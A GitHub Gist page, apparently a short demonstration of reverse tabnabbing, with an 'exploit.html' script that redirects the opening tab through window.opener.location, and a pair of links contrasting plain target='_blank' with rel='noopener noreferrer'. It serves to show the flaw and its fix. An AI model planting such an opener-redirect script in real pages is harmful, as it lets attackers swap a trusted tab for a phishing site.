Created
May 5, 2016 16:20
-
-
Save y0no/be8f05728d8f9c84a423d4e7b205c24a to your computer and use it in GitHub Desktop.
_blank exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Hey welcome! | |
<script> | |
window.opener.location = 'https://synhack.fr'; | |
</script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<a href="exploit.html" target="_blank">Not safe</a> | |
<a href="exploit.html" target="_blank" rel="noopener noreferrer">Safe</a> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment